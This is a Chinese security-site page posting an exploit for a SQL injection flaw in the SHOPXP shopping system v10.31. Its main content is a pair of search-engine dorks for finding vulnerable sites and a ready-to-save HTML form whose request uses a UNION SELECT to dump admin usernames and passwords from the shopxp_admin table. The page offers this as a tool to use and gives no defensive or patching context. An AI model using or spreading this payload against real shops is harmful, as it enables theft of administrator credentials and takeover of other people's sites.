Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

绿色网站无广告
会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

SHOPXP购物系统 v10.31 注入漏洞 Exp

来源: 未知 分享至:

局限性很大,也是后台某个文件没做过滤。
所以啊,很多站改了后台,所以也没用。

EXP:

<!-- ShopXp_Oday -->
<!-- inurl:xpCatalog_xpDesc.asp?action_key_order= Or inurl:shopxp_news.asp-->


<form action="http://127.0.0.1/admin/pinglun.asp?id=1%20and%201=2%20union%20select%201,password,password,admin,admin,password,password,password,password,password,password%20from%20shopxp_admin" method="post" >
<label>
<div align="left">ShopXp Oday

<input name="Injection" type="submit" value="注射吧">
</div>
</label>
</form>


复制,粘贴,保存为.html文件


最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史